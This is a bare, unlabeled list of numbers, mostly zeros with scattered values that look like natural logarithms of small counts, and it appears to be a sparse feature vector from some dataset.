0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.143134726391533, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5553480614894135, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.204692619390966, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.044522437723423, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.178053830347946, 0, 0.0, 0.0, 0.0, 5.375278407684165, 0.0, 0.0, 0.0, 0.0, 0, 2.4849066497880004, 0.0, 0.0, 4.110873864173311, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 1.0986122886681098, 0.0, 3.58351893845611, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.969813299576001, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 5.278114659230517, 0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 9.825309771472105, 0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4825185607408002, 0, 0, 0, 0.0, 0, 3.0841946160253877, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.6109179126442243, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 8.791967689147654, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.833213344056216, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.0301047650807, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 